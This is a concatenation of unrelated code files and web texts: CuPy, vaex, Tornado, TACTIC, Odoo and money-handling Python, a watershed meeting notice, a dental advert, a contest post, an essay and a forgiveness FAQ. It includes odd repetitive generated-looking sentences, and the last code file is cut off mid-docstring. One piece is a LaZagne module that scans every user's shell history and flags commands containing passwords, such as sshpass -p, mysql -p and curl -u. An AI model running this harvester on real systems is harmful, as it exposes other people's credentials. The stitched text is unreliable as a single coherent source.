import ctypes import os import six from cupy import cuda MAX_NDIM = 25 def _make_carray(n): class CArray(ctypes.Structure): _fields_ = (('data', ctypes.c_void_p), ('size', ctypes.c_int), ('shape', ctypes.c_int * n), ('strides', ctypes.c_int * n)) return CArray _carrays = [_make_carray(i) for i in six.moves.range(MAX_NDIM)] def to_carray(data, size, shape, strides): return _carrays[len(shape)](data, size, shape, strides) def _make_cindexer(n): class CIndexer(ctypes.Structure): _fields_ = (('size', ctypes.c_int), ('shape', ctypes.c_int * n), ('index', ctypes.c_int * n)) return CIndexer _cindexers = [_make_cindexer(i) for i in six.moves.range(MAX_NDIM)] def to_cindexer(size, shape): return _cindexers[len(shape)](size, shape, (0,) * len(shape)) class Indexer(object): def __init__(self, shape): size = 1 for s in shape: size *= s self.shape = shape self.size = size @property def ndim(self): return len(self.shape) @property def ctypes(self): return to_cindexer(self.size, self.shape) _header_source = None def _get_header_source(): global _header_source if _header_source is None: header_path = os.path.join(os.path.dirname(__file__), 'carray.cuh') with open(header_path) as header_file: _header_source = header_file.read() return _header_source def compile_with_cache(source, options=(), arch=None, cachd_dir=None): source = _get_header_source() + source return cuda.compile_with_cache(source, options, arch, cachd_dir)
What: Pajaro Compass Network Spring Stakeholder Meeting & Tour (draft agenda). The Spring Stakeholder Meeting will focus on watershed resource and restoration partnerships for water quality, flood control, and habitat. There will be a great panel of speakers representing projects in both the upper and lower watershed. As usual, there will be a project pitch session, stakeholder resource table, and training sessions on Pajaro Compass Web Tools. Following a networking lunch (lunch provided), there will be an optional tour of the Pajaro Valley Water Management Agency Wastewater Plant. A couple items to consider prior to attending the meeting:Bring flyers, brochures, or hand-outs to share with other network stakeholders via the resource table.Take a look at the Pajaro Compass Web Tools and come with questions. Click the following links for the Pajaro Compass Webmap and Interactive Planner tools. The Pajaro Compass is a voluntary network of landowners and managers, public agencies, conservation organizations, funders, and elected officials with a common interest in maintaining a healthy and productive Pajaro River watershed. The Pajaro River watershed is an area of approximately 1,300 square miles, and includes portions of three mountain ranges (Santa Cruz, Gabilan and Diablo) and four counties (Santa Clara, Santa Cruz, San Benito and Monterey). It includes productive farms and ranches, rich natural areas, and culturally significant places. The Pajaro Compass provides a gateway for participants to learn, connect, and engage in conservation efforts throughout the watershed that promote healthy soils, clean water, productive landscapes, and habitat for native wildlife. Twice a year, the Pajaro Compass Network convenes a meeting to discuss topics of interest to the network community. The theme of this Spring's meeting, to be held on Wednesday April 24 at the City of Watsonville Community Room, is "One Watershed, Many Perspectives: Partnerships in the Pajaro. The meeting will feature networking opportunities, two speaker panels and an optional tour by the Pajaro Valley Water Management Agency of how water gets recycled at the Watsonville Wastewater Plant.
# -*- coding: utf-8 -*- import os import logging import time from .utils import debounced, flush, gather, kernel_tick, interactive_selection, interactive_cleanup # noqa import vaex import IPython.display base_path = os.path.dirname(__file__) logger = logging.getLogger("vaex.jupyter") def _add_toolbar(viz): from .widgets import ToolsToolbar, tools_items_default from traitlets import link interact_items = [k for k in tools_items_default if k['value'] in viz.TOOLS_SUPPORTED] toolbar = ToolsToolbar(supports_transforms=viz.supports_transforms, supports_normalize=viz.supports_normalize, interact_items=interact_items) viz.children = [toolbar, ] + viz.children link((viz, 'tool'), (toolbar, 'interact_value')) link((viz, 'transform'), (toolbar, 'transform_value')) link((viz, 'normalize'), (toolbar, 'normalize')) link((viz, 'selection_mode'), (toolbar, 'selection_mode')) return toolbar class DataFrameAccessorWidget(object): def __init__(self, df): self.df = df import vaex.jupyter.grid self.grid = vaex.jupyter.model.GridCalculator(df, []) self._last_grid = None @debounced(delay_seconds=0.1, reentrant=False) async def execute_debounced(self): """Schedules an execution of dataframe tasks in the near future (debounced).""" try: logger.debug("Execute tasks... tasks=%r", self.df.executor.tasks) await self.df.execute_async() logger.debug("Execute tasks done") except vaex.execution.UserAbort: pass # this is fine except Exception: logger.exception("Error while executing tasks") def clear(self): self.grid = vaex.jupyter.model.GridCalculator(self.df, []) def data_array(self, axes=[], selection=None, shared=False, display_function=IPython.display.display, **kwargs): '''Create a :func:`vaex.jupyter.model.DataArray` model and :func:`vaex.jupyter.view.DataArray` widget and links them. This is a convenience method to create the model and view, and hook them up. ''' import vaex.jupyter.model import vaex.jupyter.view if selection is not None: selection = selection.copy() model = vaex.jupyter.model.DataArray(df=self.df, axes=axes, selection=selection, **kwargs) if shared: grid = self.grid else: grid = vaex.jupyter.model.GridCalculator(self.df, []) grid.model_add(model) view = vaex.jupyter.view.DataArray(model=model, display_function=display_function) return view def axis_model(self, expression, limits=None): return self._axes([expression], limits=[limits])[0] def _axes(self, expressions, limits): limits = self.df.limits(expressions, limits) axes = [vaex.jupyter.model.Axis(df=self.df, expression=expression, min=min, max=max) for expression, (min, max) in zip(expressions, limits)] return axes def histogram(self, x, limits=None, selection=None, selection_interact='default', toolbar=True, shared=False, **kwargs): import vaex.jupyter.model import vaex.jupyter.view if selection is not None: selection = selection.copy() x, = self._axes([x], limits) model = vaex.jupyter.model.Histogram(df=self.df, x=x, selection=selection, selection_interact=selection_interact, **kwargs) if shared: grid = self.grid else: grid = vaex.jupyter.model.GridCalculator(self.df, []) grid.model_add(model) viz = vaex.jupyter.view.Histogram(model=model) if toolbar: viz.toolbar = _add_toolbar(viz) return viz def pie(self, x, limits=None, shared=False, **kwargs): import vaex.jupyter.model import vaex.jupyter.view x, = self._axes([x], limits) model = vaex.jupyter.model.Histogram(df=self.df, x=x, **kwargs) if shared: grid = self.grid else: grid = vaex.jupyter.model.GridCalculator(self.df, []) grid.model_add(model) viz = vaex.jupyter.view.PieChart(model=model) return viz def heatmap(self, x, y, limits=None, selection=None, selection_interact='default', transform='log', toolbar=True, shape=256, shared=False, **kwargs): import vaex.jupyter.model import vaex.jupyter.view x, y = self._axes([x, y], limits) if selection is not None: selection = selection.copy() model = vaex.jupyter.model.Heatmap(df=self.df, x=x, y=y, selection=selection, shape=shape, **kwargs) if shared: grid = self.grid else: grid = vaex.jupyter.model.GridCalculator(self.df, []) self._last_grid = grid grid.model_add(model) viz = vaex.jupyter.view.Heatmap(model=model, transform=transform) if toolbar: viz.toolbar = _add_toolbar(viz) return viz def expression(self, value=None, label='Custom expression'): '''Create a widget to edit a vaex expression. If value is an :py:`vaex.jupyter.model.Axis` object, its expression will be (bi-directionally) linked to the widget. :param value: Valid expression (string or Expression object), or Axis ''' from .widgets import ExpressionTextArea import vaex.jupyter.model if isinstance(value, vaex.jupyter.model.Axis): expression_value = str(value.expression) else: expression_value = str(value) if value is not None else None expression_widget = ExpressionTextArea(df=self.df, v_model=expression_value, label=label) if isinstance(value, vaex.jupyter.model.Axis): import traitlets traitlets.link((value, 'expression'), (expression_widget, 'value')) return expression_widget def column(self, value=None, label='Choose a column'): from .widgets import ColumnPicker if isinstance(value, vaex.jupyter.model.Axis): expression_value = str(value.expression) else: expression_value = str(value) if value is not None else None column_widget = ColumnPicker(df=self.df, value=expression_value, label=label) if isinstance(value, vaex.jupyter.model.Axis): import traitlets traitlets.link((value, 'expression'), (column_widget, 'value')) return column_widget def selection_expression(self, initial_value=None, name='default'): from .widgets import ExpressionSelectionTextArea if initial_value is None: if not self.df.has_selection(name): raise ValueError(f'No selection with name {name!r}') else: initial_value = self.df.get_selection(name).boolean_expression return ExpressionSelectionTextArea(df=self.df, selection_name=name, v_model=str(initial_value) if initial_value is not None else None) def progress_circular(self, width=10, size=70, color='#82B1FF', text='', auto_hide=False): from .widgets import ProgressCircularNoAnimation progress_circular = ProgressCircularNoAnimation(width=width, size=size, color=color, text=text, value=0) @self.df.executor.signal_begin.connect def progress_begin(): if auto_hide: progress_circular.hidden = False @self.df.executor.signal_progress.connect def update_progress(value): progress_circular.value = value*100 return True @self.df.executor.signal_end.connect def progress_update(): if auto_hide: progress_circular.hidden = True return progress_circular def counter_processed(self, postfix="rows processed", update_interval=0.2): from .widgets import Counter counter_processed = Counter(value=0, postfix=postfix) last_time = 0 @self.df.executor.signal_begin.connect def progress_begin(): nonlocal last_time last_time = time.time() @self.df.executor.signal_progress.connect def update_progress(value): nonlocal last_time number = int(value * len(self.df)) current_time = time.time() if (current_time - last_time) > update_interval or value in [0, 1]: counter_processed.value = number last_time = current_time return True return counter_processed def counter_selection(self, selection, postfix="rows selected", update_interval=0.2, lazy=False): from .widgets import Counter selected = self.df.count(selection=selection).item() if self.df.has_selection(name=selection) else 0 counter_selected = Counter(value=selected, postfix=postfix) dirty = False @self.df.signal_selection_changed.connect def selection_changed(df, name): nonlocal dirty if name == selection: # we only need to run once if not dirty: dirty = True def update_value(value): nonlocal dirty dirty = False try: value = value.item() except: # noqa pass counter_selected.value = value # if lazy is True, this will only schedule the calculation, not yet execute it if lazy: vaex.delayed(update_value)(self.df.count(selection=selection, delay=True)) else: update_value(self.df.count(selection=selection)) return counter_selected # from .widgets import Tools # from traitlets import link # viz = [] if viz is None else viz # viz = [viz] if not isinstance(viz, (tuple, list)) else viz # tools = Tools(value=initial_value, children=[k.widget for k in viz]) # for v in viz: # link((tools, 'value'), (v, 'tool')) # return tools # def card(plot, title=None, subtitle=None, **kwargs): # from .widget import Card # return Card(main=plot, title=title, subtitle, def add_namespace(): pass
At Dixon Park Dental Care, our number one goal is to provide the people of Kokomo, Indiana with comprehensive, affordable dental care. Our team of technicians, hygienists, and dentists will work with you to develop a treatment plan that is custom tailored to your unique needs. We utilize state-of-the-art technology so we can analyze and diagnose with extraordinary accuracy. At Dixon Park Dental Care we are committed to offering the people of Kokomo, Indiana dental services that are effective, convenient, and affordable. We provide a wide range of services at Dixon Park Dental Care. In addition to addressing immediate problems such as a broken tooth, painful cavity, or a faded smile, at Dixon Park Dental Care we are eager to help you with the kind of preventative care that will maintain your oral health and take care of minor issues before they develop into major problems. We believe this is the most effective way to achieve a bright, healthy smile while saving you time and money. At Dixon Park Dental Care, we firmly believe that the best dental care is preventative dental care. Our goal is to help you maintain an effective routine for oral hygiene so that you are able to prevent tooth decay and avoid the cost and effort of dealing with cavities and gum disease. You can safeguard your smile with a visit to Dixon Park Dental Care every six months for a professional cleaning and dental exam. The dental team here at Dixon Park Dental Care can remove stubborn plaque and tartar buildup that regular brushing simply can't handle as well as identify the warning signs of decay and damage that would normally go unnoticed. Are you suffering from a toothache, a lost filling, painful gums, or a damaged tooth? Our dental team at Dixon Park Dental Care in Kokomo, Indiana can identify your particular problem and provide a stress-free treatment with your comfort in mind. Our highly trained technicians, hygienists, and dentists will employ the most up-to-date methods and innovative technology to administer care that is accurate, effective, and affordable. From new fillings to root canals, at Dixon Park Dental Care, we ensure that our patients in Kokomo, Indiana receive the care necessary to enjoy healthy teeth for years to come. Regardless of how rigorously you care for your teeth, over time, you may suffer physical trauma that results in weakened, chipped, or missing teeth. These conditions can compound and lead to a bite misalignment, bone degeneration, or even further tooth loss. However, at Dixon Park Dental Care in Kokomo, Indiana we can customize a treatment plan for veneers, crowns, bridges, dentures, or dental implants that will restore your smile and promote overall excellent oral health. Restoring your ideal dental structure not only improves your appearance and oral health but also prevents adjacent teeth from shifting and eliminates the discomfort of a misaligned bite. We utilize the most advanced technology and state-of-the-art equipment here at Dixon Park Dental Care in Kokomo, Indiana in order to provide our patients with the highest quality of dental care. Our high-resolution dental imaging equipment produces real-time views of your teeth, gums, and surrounding support structure in unprecedented detail. This allows our dentist to diagnose problems with the highest degree of accuracy and you can relax in the confidence of knowing that you're getting the quality of care you deserve. At Dixon Park Dental Care in Kokomo, Indiana you will receive treatment that is customized to your needs and provided by our exceptionally well trained dental team using the most advanced oral care tools. Abscesses, tooth decay, infected gums, cavities and other oral health problems can be incredibly uncomfortable, and we are here to treat dental issues that just can't wait for your regular check-up. Whether you're suffering from a painful cavity, cracked tooth, broken dentures or a misplaced filling, please don't hesitate to give Dixon Park Dental Care in Kokomo, Indiana a call! Research shows periodontal problems can potentially elevate the risk for other health issues, including diabetes, stroke and cardiovascular disease. Your health and comfort are our first priority. If you are in the Kokomo, Indiana and experiencing serious oral pain, call Dixon Park Dental Care directly at 765-452-0530 and one of our team members will schedule a consultation with you during our regular business hours. At Dixon Park Dental Care of Kokomo, Indiana we firmly believe that your oral health directly affects your overall health and we are ready to take care of any of your dental problems. Call Dixon Park Dental Care at 765-452-0530 today to schedule an appointment and get the smile you've always wanted!
import app.basic, settings, ui_methods import simplejson as json import logging import tornado.web from mongoengine.queryset import Q, DoesNotExist, MultipleObjectsReturned from db.userdb import User from db.groupdb import Group from db.profiledb import Profile from group_api import AcceptInvite ######################## ### Settings page for a user ### /user/settings ######################## class UserSettings(app.basic.BaseHandler): @tornado.web.authenticated def get(self): # Find user by email try: user = User.objects.get(email=self.current_user) except MultipleObjectsReturned: raise tornado.web.HTTPError(500) except DoesNotExist: raise tornado.web.HTTPError(404) # Display User's Groups groups = user.get_groups() group_invites_raw = Group.objects(Q(invited_emails=self.current_user) | Q(domain_setting__icontains=user.get_domain())) group_invites = [] for g in group_invites_raw: if g not in groups: group_invites.append(g) # User pays for groups larger than 5 people paying_groups_raw = groups(admin=user) paying_groups = [] for g in paying_groups_raw: if len(g.users) > 5: paying_groups.append(g) # Possible message or error msg = self.get_argument('msg', '') err = self.get_argument('err', '') return self.render('user/user_settings.html', user=user, groups=groups, group_invites=group_invites, paying_groups=paying_groups, msg=msg, err=err, list_to_comma_delimited_string=ui_methods.list_to_comma_delimited_string, nav_select='settings', nav_title='Settings for %s' % user.casual_name()) ######################## ### Welcome page for a new user ### /user/welcome ######################## class UserWelcome(app.basic.BaseHandler): @tornado.web.authenticated def get(self): ''' user_welcome.html sends AJAX requests to group_api.py for user to join groups he/she is invited to ''' if self.user.welcomed and self.user.email not in settings.get('staff'): return self.redirect('/') else: self.user.welcomed = True self.user.save() # Invited Groups. Display as joined, but join via AJAX by default group_invites = self.user.groups_can_join() group_invites = list(set(group_invites)) return self.render('user/user_welcome.html', # extends dashboard.html user = self.user, nav_title = True, nav_select = 'dashboard', groups = None, group_invites = group_invites, recent_contacts = None, # not enough time for this script to execute today_reminders = None, later_reminders = None) # new users never have any reminders
Short Clip of stains vanishing from a towel. Modeled with Maya using ncloth and displacement maps. The stains is filmed footage of real ink spreading across a surface, then reversed for the vanishing effect.
""" this is a script to help tranfer a data format that was used initially to store downloaded geocoded coordinates to the current one... not a database migration script note added *2014.03.01 20:07:37 ... script is older than that """ import os, json, codecs, re from helpers import save_json, load_json, Location, Geo, save_results def update_json(source, city_tag): cache_file = "%s.json" % city_tag cache_destination = os.path.join(os.path.dirname(source), cache_file) local_cache = load_json(cache_destination, create=True) assert local_cache.has_key('buildings') assert local_cache.has_key('parcels') locations = {} for key, value in local_cache['buildings'].items(): location = Location(value) for source in location.sources: if hasattr(location, source): result = getattr(location, source) #convert from old dict format here if isinstance(result, dict): print "Found dictionary in: %s for: %s" % (source, location.address) result = [ result ] setattr(location, source, result) locations[key] = location #back it up for later #enable this when downloading GPS coordinates... #the rest of the time it slows things down local_cache['buildings'] = {} for key, value in locations.items(): local_cache['buildings'][key] = value.to_dict() save_json(cache_destination, local_cache) if __name__ == '__main__': #main() #update_json('/c/clients/green_rentals/cities/bloomington/data/Bloomington_rental.csv') update_json('/c/clients/green_rentals/cities/ann_arbor/data/ann_arbor.json', "ann_arbor")
What is one major difference between forgiving other people and forgiving yourself? When you forgive others, if you did nothing wrong, then you do not ask for forgiveness. When you forgive yourself, you usually offend others by what you did. Thus, self-forgiveness involves not only welcoming yourself back into the human community but also seeking forgiveness from others for hurting them by this particular action. For additional information, see Self-Forgiveness. Next Article What are the different meanings to the word “forget” when we say, “Forgive and forget”?
''' Created on 2015年12月4日 given [1, [2,3], [[4]]], return sum. 计算sum的方法是每向下一个level权重+1, 例子的sum = 1 * 1 + (2 + 3) * 2 + 4 * 3。follow up:每向下一个level 权重 - 1, sum = 3 * 1 +(2 + 3)* 2 + 4 * 1 @author: Darren ''' def levelSum(string): if not string: return 0 index=0 level=0 maxLevel=0 d={} while index<len(string): char= string[index] if char=="[": level+=1 maxLevel=max(maxLevel,level) index+=1 elif char.isdigit(): startIndex=index while string[index].isdigit(): index+=1 num=int(string[startIndex:index]) if level not in d: d[level]=[] d[level].append(num) elif char=="]": level-=1 index+=1 else: index+=1 res=0 for key,value in d.items(): for num in value: res+=(maxLevel-key+1)*num return res print(levelSum("[1, [2,3], [2,3],[[4]]]") )
I have to say — I have always been in full support of cosmopolitan lifestyles — and I love and totally treasure diversity, everything multicultural, and getting around different cities and countries. So I was kind of disappointed when I arrived in Nanning, capital of China’s Guangxi Zhuang Autonomous Region, and did not see the Zhuang name of the city — Namzningz — at the main station. Oh well. But I did enjoy the city itself.
########################################################### # # Copyright (c) 2014, Southpaw Technology # All Rights Reserved # # PROPRIETARY INFORMATION. This software is proprietary to # Southpaw Technology, and is not to be reproduced, transmitted, # or disclosed in any way without written permission. # # # __all__ = ['SandboxSelectWdg'] from pyasm.common import Environment, jsonloads, jsondumps, Config from pyasm.biz import Project from pyasm.web import DivWdg, Table, WidgetSettings from tactic.ui.common import BaseRefreshWdg from pyasm.widget import IconWdg, RadioWdg from tactic.ui.widget import IconButtonWdg from pyasm.search import Search, SearchType class SandboxSelectWdg(BaseRefreshWdg): def get_display(my): top = my.top top.add_class("spt_sandbox_select_top") sandbox_options = [ { 'name': 'fast', 'base_dir': 'C:/Fast', }, { 'name': 'faster', 'base_dir': 'C:/Faster', }, { 'name': 'slow', 'base_dir': 'Z:/Slow', } ] process = my.kwargs.get("process") search_key = my.kwargs.get("search_key") sobject = Search.get_by_search_key(search_key) search_type = sobject.get_base_search_type() client_os = Environment.get_env_object().get_client_os() if client_os == 'nt': prefix = "win32" else: prefix = "linux" alias_dict = Config.get_dict_value("checkin", "%s_sandbox_dir" % prefix) search_key = sobject.get_search_key() key = "sandbox_dir:%s" % search_key from pyasm.web import WidgetSettings value = WidgetSettings.get_value_by_key(key) sandboxes_div = DivWdg() top.add(sandboxes_div) sandboxes_div.add_relay_behavior( { 'type': 'mouseenter', 'bvr_match_class': 'spt_sandbox_option', 'cbjs_action': ''' var last_background = bvr.src_el.getStyle("background-color"); bvr.src_el.setAttribute("spt_last_background", last_background); bvr.src_el.setStyle("background-color", "#E0E0E0"); bvr.src_el.setStyle("opacity", "1.0"); ''' } ) sandboxes_div.add_relay_behavior( { 'type': 'mouseleave', 'bvr_match_class': 'spt_sandbox_option', 'cbjs_action': ''' var last_background = bvr.src_el.getAttribute("spt_last_background"); bvr.src_el.setStyle("background-color", last_background); if (!bvr.src_el.hasClass("spt_selected")) { bvr.src_el.setStyle("opacity", "0.5"); } ''' } ) sandboxes_div.add_relay_behavior( { 'type': 'mouseup', 'key': key, 'bvr_match_class': 'spt_sandbox_option', 'cbjs_action': ''' var sandbox_dir = bvr.src_el.getAttribute("spt_sandbox_dir"); var server = TacticServerStub.get(); server.set_widget_setting(bvr.key, sandbox_dir); var applet = spt.Applet.get(); applet.makedirs(sandbox_dir); //var top = bvr.src_el.getParent(".spt_sandbox_select_top"); var top = bvr.src_el.getParent(".spt_checkin_top"); spt.panel.refresh(top); ''' } ) #search = Search("config/naming") #search.add_filter("search_type", search_type) #search.add_filter("process", process) #namings = search.get_sobjects() #naming = namings[0] from pyasm.biz import Snapshot, Naming virtual_snapshot = Snapshot.create_new() virtual_snapshot.set_value("process", process) # for purposes of the sandbox folder for the checkin widget, # the context is the process virtual_snapshot.set_value("context", process) naming = Naming.get(sobject, virtual_snapshot) if naming: naming_expr = naming.get_value("sandbox_dir_naming") alias_options = naming.get_value("sandbox_dir_alias") else: naming_expr = None alias_options = None if alias_options == "__all__": alias_options = alias_dict.keys() elif alias_options: alias_options = alias_options.split("|") else: alias_options = ['default'] for alias in alias_options: from pyasm.biz import DirNaming dir_naming = DirNaming(sobject=sobject, snapshot=virtual_snapshot) dir_naming.set_protocol("sandbox") dir_naming.set_naming(naming_expr) base_dir = dir_naming.get_dir(alias=alias) sandbox_div = DivWdg() sandboxes_div.add(sandbox_div) sandbox_div.add_class("spt_sandbox_option") sandbox_div.add_attr("spt_sandbox_dir", base_dir) if value == base_dir: sandbox_div.add_color("background", "background3") #sandbox_div.set_box_shadow() sandbox_div.add_class("spt_selected") else: sandbox_div.add_style("opacity", "0.5") sandbox_div.add_style("width: auto") sandbox_div.add_style("height: 55px") sandbox_div.add_style("padding: 5px") #sandbox_div.add_style("float: left") sandbox_div.add_style("margin: 15px") sandbox_div.add_border() if alias: alias_div = DivWdg() sandbox_div.add(alias_div) alias_div.add(alias) alias_div.add_style("font-size: 1.5em") alias_div.add_style("font-weight: bold") alias_div.add_style("margin-bottom: 15px") icon_wdg = IconWdg("Folder", IconWdg.FOLDER) sandbox_div.add(icon_wdg) sandbox_div.add(base_dir) return top
WE HAVE A WINNER! - WIN Tickets to Mediacorp Channel 5's Celebrate 2012 at Marina Bay S'pore Countdown! Hope you'll enjoy the show and Fireworks! Intending to head on down to the Marina Bay Singapore Countdown Party on New Year's Eve? Want to catch performances by latest Canadian sensation These Kids Wear Crowns, Siti Nurhaliza, Sheikh Haikel, Nat Ho, Inch Chua, Sezairi Sezali and Sylvia Ratonel? Itching to get a good view of the Fireworks? We have A PAIR OF TICKETS worth $50 to GIVEAWAY! 2. Answer the following question by posting your comment under THIS post - Name one of the performing acts for Marina Bay Singapore Countdown 2012. Contest closes on 30 DECEMBER 2011, 5PM. Performances by These Kids Wear Crowns. Never seen them live b4! live show by Gurmit Singh and Michelle Chia,Malaysia's Siti Nurhaliza and Canada's pop-rock sensation, 'These Kids Wear Crowns'.
#!/usr/bin/env python # -*- coding: utf-8 -*- import psutil import pwd import os from lazagne.config.module_info import ModuleInfo from lazagne.config import homes try: from ConfigParser import ConfigParser # Python 2.7 except ImportError: from configparser import ConfigParser # Python 3 class Cli(ModuleInfo): def __init__(self): ModuleInfo.__init__(self, 'cli', 'sysadmin') def get_files(self): known = set() for user, histfile in homes.users(file=['.history', '.sh_history', '.bash_history', '.zhistory']): yield user, histfile known.add(histfile) try: for process in psutil.process_iter(): try: environ = process.environ() user = process.username() except Exception: continue if 'HISTFILE' not in environ: continue histfile = environ['HISTFILE'] if histfile in ('/dev/zero', '/dev/null'): continue if histfile.startswith('~/'): try: home = pwd.getpwuid(process.uids().effective).pw_dir except Exception: continue histfile = os.path.join(home, histfile[2:]) if os.path.isfile(histfile) and not histfile in known: yield user, histfile known.add(histfile) except AttributeError: # Fix AttributeError: 'module' object has no attribute 'process_iter' pass def get_lines(self): known = set() for user, plainfile in self.get_files(): try: with open(plainfile) as infile: for line in infile.readlines(): line = line.strip() if line.startswith('#'): continue try: int(line) continue except Exception: pass line = ' '.join(x for x in line.split() if x) if line not in known: yield user, line known.add(line) except Exception: pass for user, histfile in homes.users(file='.local/share/mc/history'): parser = ConfigParser() try: parser.read(histfile) except Exception: continue try: for i in parser.options('cmdline'): line = parser.get('cmdline', i) if line not in known: yield user, line known.add(line) except Exception: pass def suspicious(self, user, line): markers = [ ('sshpass', '-p'), ('chpasswd',), ('openssl', 'passwd'), ('sudo', '-S'), ('mysql', '-p'), ('psql', 'postgresql://'), ('pgcli', 'postgresql://'), ('ssh', '-i'), ('sqlplus', '/'), ('xfreerdp', '/p'), ('vncviewer', 'passwd'), ('vncviewer', 'PasswordFile'), ('mount.cifs', 'credentials'), ('pass=',), ('smbclient',), ('ftp', '@'), ('wget', '@'), ('curl', '@'), ('curl', '-u'), ('wget', '-password'), ('rdesktop', '-p'), ] for marker in markers: if all((x in line) for x in marker): yield { 'User': user, 'Cmd': line } def run(self): all_cmds = [] for user, line in self.get_lines(): for cmd in self.suspicious(user, line): all_cmds.append(cmd) return all_cmds
The Jobs of Tomorrow? - Rally, Comrades!Rally, Comrades! The U.S. community college system is the largest public education system in the world, with over 5 million students. Community colleges traditionally have been used by students for remediation, life-long learning, training in specific skills, and for two-year degrees, leading to university. Obama has announced a new mission — training the work force of today for the jobs of tomorrow. At the same time, community colleges are being cut by hundreds of millions of dollars. The same “public/private partnerships” that lead to corporatization and privatization are supposedly going to save the day. But what exactly are the jobs of tomorrow? The introduction of electronics is destroying the unskilled and semiskilled jobs that marked the Industrial Era. Computers are transforming these jobs into temp jobs and precarious labor that works little, but is always on call. It is simply a lie that the capitalist system will produce jobs that can sustain families for the whole working class. That’s not profitable. The capitalist class can use what they need of the huge U.S. population as an army of low-paid and contingent workers. Why would they fund a two-year community college degree program that equips people for anything more? To restructure for this future, community colleges are cutting classes and driving out students. They will no longer permit students to re-take a course they fail, and will require every student to be on a job track and take only those courses. In community colleges, as in K-12 education and public universities, the government is being re-organized to directly conform to a for-profit system.
# -*- coding: utf-8 -*- from lxml import etree from odoo.tests.common import TransactionCase from odoo.tools.safe_eval import safe_eval as eval class CRUDCase(TransactionCase): def crud(self, model, create_vals={}, write_vals={}, check_vals={}, view_id=None): arch = model.fields_view_get(view_id=view_id, view_type='form', toolbar=True) data = model.default_get(arch['fields'].keys()) self.assertTrue(arch['toolbar']) obj = model.create(create_vals) self.assertTrue(obj.exists()) obj = model.browse(obj.id) self.assertTrue(obj) data = obj.read(arch['fields'].keys()) arch = model.fields_view_get(view_type='tree') data = obj.read(arch['fields'].keys()) obj.write(write_vals) for k, v in write_vals.items(): if type(obj[k]) != type(v) and isinstance(v, int): self.assertEqual(obj[k].id, v) else: self.assertEqual(obj[k], v) for k, v in check_vals.items(): self.assertEqual(obj[k], v) arch = model.fields_view_get(view_type='tree', toolbar=True) self.assertTrue(arch['toolbar']) arch = model.fields_view_get(view_type='search') self.assertTrue(arch) nodes = etree.XML(arch['arch']).xpath("/search/group/filter") if not nodes: nodes = etree.XML(arch['arch']).xpath("/search/filter") groups = [] fields = [] for node in nodes: node = eval(node.get('context')) if 'group_by' not in node: continue node = node.get('group_by').decode('utf-8', 'ignore') groups.append(node) fields.append(node.split(":")[0]) fields = list(set(fields)) if groups: field_names = self.env['ir.model.fields'].search([ ('model', '=', model._name), ('name', 'in', fields)]).mapped('name') self.assertEqual(len(fields), len(field_names)) res = model.read_group(domain=[], fields=fields, groupby=groups, lazy=True) self.assertTrue(res) obj.unlink() self.assertFalse(obj.exists())
"There can be acceptance corps." "There can be acceptance rates." "There can be acceptance conditions." "There can be acceptance insurances." "There can be acceptance levels." "There can be acceptance forms." "There can be acceptance corp.s." "There can be acceptance bills." "There can be acceptance periods." "There can be acceptance trials." "There can be acceptance points." "There can be acceptance houses." "There can be acceptance fees." "There can be acceptance criteria." "There can be acceptance credits." "There can be acceptance amongsts." "There can be acceptance stakes." "There can be acceptance samplings." "There can be acceptance dates." "There can be acceptance corporations."
# -*- coding: utf-8 -*- from __future__ import division import decimal from collections import namedtuple from six import PY3 from .exchange_rates import get_exchange_rate from .exceptions import ExchangeError, MoneyError def round_amount(amount, currency): """Round a given amount using curreny's exponent. :param amount: :class:`~decimal.Decimal` number. :param currency: :class:`~rockefeller.currency.Currency` object. :return: Rounded amount as a :class:`~decimal.Decimal` number. :raises: :class:`~rockefeller.exceptions.MoneyError` if an invalid currency is supplied. """ try: exponent = currency.exponent except AttributeError: raise MoneyError('Wrong currency `{!r}` for money.'.format(currency)) exponent = '1.' + '0' * currency.exponent return amount.quantize(decimal.Decimal(exponent), rounding=decimal.ROUND_HALF_UP) def to_decimal(value): """Convert a value into a decimal value. :param value: Any value that can be casted into a numeric string. :return: Decimal value. :class:`~decimal.Decimal` instance. """ if not isinstance(value, decimal.Decimal): value = decimal.Decimal(str(value)) return value def _check_operand(operation, operand): if not isinstance(operand, Money): msg = "unsupported operand type(s) for %s: 'Money' and '%r'" % ( operation, operand.__class__) raise TypeError(msg) class Money(namedtuple('Money', 'amount currency')): """Representation of money. Every `Money` objects has an amount and a currency associated to it and the amount is always a :class:`~decimal.Decimal` value. Initialization params: `amount` Amount of money. `currency` Money currency. :class:`~rockefeller.currency.Currency` instance. """ indirection_currency = None def __new__(cls, amount, currency): return super(Money, cls).__new__(cls, to_decimal(amount), currency) def __eq__(self, other): return (isinstance(other, self.__class__) and self.amount == other.amount and self.currency == other.currency) def __add__(self, other): _check_operand('+', other) return Money(self.amount + other.amount, self.currency) def __sub__(self, other): _check_operand('-', other) return Money(self.amount - other.amount, self.currency) def __mul__(self, other): _check_operand('*', other) return Money(self.amount * other.amount, self.currency) def __div__(self, other): _check_operand('/', other) return Money(self.amount / other.amount, self.currency) __floordiv__ = __div__ __truediv__ = __div__ def __divmod__(self, other): quotient, remainder = divmod(self.amount, other.amount) return Money(quotient, self.currency), Money(remainder, self.currency) def __float__(self): return float(round_amount(self.amount, self.currency)) def __str__(self): value = self.__unicode__() if PY3: return value return value.encode('utf-8') def __unicode__(self): amount = self.amount parts = str(amount).split('.') if len(parts) == 2 and int(parts[1]) == 0: amount = parts[0] return u'{}{}'.format(self.currency.symbol, amount) def remove(self, other): result = self - other if result.amount < 0: result = Money(0, self.currency) return result def get_exchange_rate_to(self, currency, indirection_currency=None): """Get exchange rate of the currency of this money relatively to ``currency``. :param currency: Output currency. :class:`~rockefeller.currency.Currency` instance. :param indirection_currency: Use this currency as the indirection currency. :class:`~rockefeller.currency.Currency` instance. :return: Exchange rate as a ``decimal`` if found, else ``None``. """ rate = get_exchange_rate(self.currency, currency) if rate is None: if not indirection_currency and Money.indirection_currency: indirection_currency = Money.indirection_currency rate_from_base = get_exchange_rate(self.currency, indirection_currency) rate_base_to = get_exchange_rate(indirection_currency, currency) if rate_from_base and rate_base_to: rate = rate_from_base * rate_base_to return rate @property def rounded_amount(self): return round_amount(self.amount, self.currency) def exchange_to(self, currency, indirection_currency=None, exchange_rate=None): """Convert this money into money of another currency. :param currency: Convert this money into this currency. :class:`~rockefeller.currency.Currency` instance. :param indirection_currency: Use this currency as the indirection currency. :class:`~rockefeller.currency.Currency` instance. :param exchange_rate: Use this exchange rate instead of trying to find one. :return: Money in ``currency`` currency. :class:`~rockefeller.money.Money` 